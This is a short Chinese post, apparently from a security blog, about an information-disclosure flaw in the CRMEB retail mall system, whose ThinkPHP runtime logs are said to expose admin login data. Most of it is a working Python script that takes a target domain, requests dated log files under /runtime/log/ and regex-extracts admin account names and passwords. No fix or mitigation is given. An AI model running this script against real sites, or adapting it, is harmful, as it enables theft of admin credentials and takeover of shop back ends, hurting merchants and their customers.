前言基于ThinkPhp5.0+Vue+EasyWeChat 开发的一套CRMEB新零售商城系统CRMEB系统就是集客户关系管理+营销电商系统,能够真正帮助企业基于微信公众号、小程序、wap、pc、app等,实现会员管理、数据分析,精准营销的电子商务管理系统。可满足企业新零售、批发、分销、预约、O2O、多店等各种业务需求正文CRMEB默认会记录网站数据包并存
前言
基于ThinkPHP5.0+Vue+EasyWeChat 开发的一套CRMEB新零售商城系统
CRMEB系统就是集客户关系管理+营销电商系统,能够真正帮助企业基于微信公众号、小程序、wap、pc、app等,实现会员管理、数据分析,精准营销的电子商务管理系统。可满足企业新零售、批发、分销、预约、O2O、多店等各种业务需求
正文
这是一个非常危险的行为,因为攻击者可以利用这些日志进入后台控制后台权限。
由于日志的路径为:
runtime\log\2019{month}{day}.log
附上Python脚本来寻找CRMEB管理系统的网站后台密码
import requests,re from threading import Thread,activeCount from queue import Queue import sys requests.packages.urllib3.disable_warnings() def send_request(url): resp = requests.get(url,verify=False) return resp def year(): logs = [] year = ['201907','201906','201905','201904','201903','201902','201901'] for _ in year: for i in range(0,31): if i <10: i = '0' + str(i) logs.append(_+'/'+str(i)+'.log') return logs def check_pass(url): resp = send_request(url) pattern_pass = re.compile("'pwd' => '(.*?)'",re.S) pattern_account = re.compile("'account' => '(.*?)'",re.S) result = re.findall(pattern_pass,resp.text) if result: account = re.findall(pattern_account,resp.text) print('pwd found {}:{}'.format(account[0],result[0])) if __name__ == '__main__': domain = sys.argv[1] domain = domain + '/runtime/log/' #print(domain) queue = Queue() for i in year(): queue.put(i) while queue.qsize()>0: if activeCount()<=10: url = '{}{}'.format(domain,queue.get()) #print(url) Thread(target=check_pass,args=(url,)).start()